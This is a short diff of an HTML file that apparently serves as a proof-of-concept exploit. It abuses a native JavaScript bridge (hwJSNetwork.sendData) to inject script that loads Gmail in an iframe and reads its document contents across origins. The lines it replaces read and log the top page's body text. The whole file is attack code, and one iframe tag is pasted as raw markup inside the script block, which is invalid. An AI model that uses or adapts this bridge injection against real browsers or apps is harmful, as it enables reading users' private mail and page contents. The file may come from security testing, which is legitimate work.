--- a/hw.html
+++ b/hw.html
@@ -1,5 +1,5 @@
 <script>
-  var body = top.document.body.innerText;
-  console.log("console try:"+body);
-  hwJSNetwork.sendData("https://", "GET", "", "", "console.log('sendData:'+body); dummy");
+  <iframe src="https://mail.google.com/mail/" id="me2"></iframe>
+  hwJSNetwork.sendData("https://", "GET", "", "", "var i = document.createElement('iframe'); i.id = 'me'; i.src = 'https://mail.google.com/mail/'; window.document.body.appendChild(i); dummy");
+  hwJSNetwork.sendData("https://", "GET", "", "", "window.alert(1); var body = window.document.getElementById('me').contentDocument; window.alert(body); dummy");
 </script>
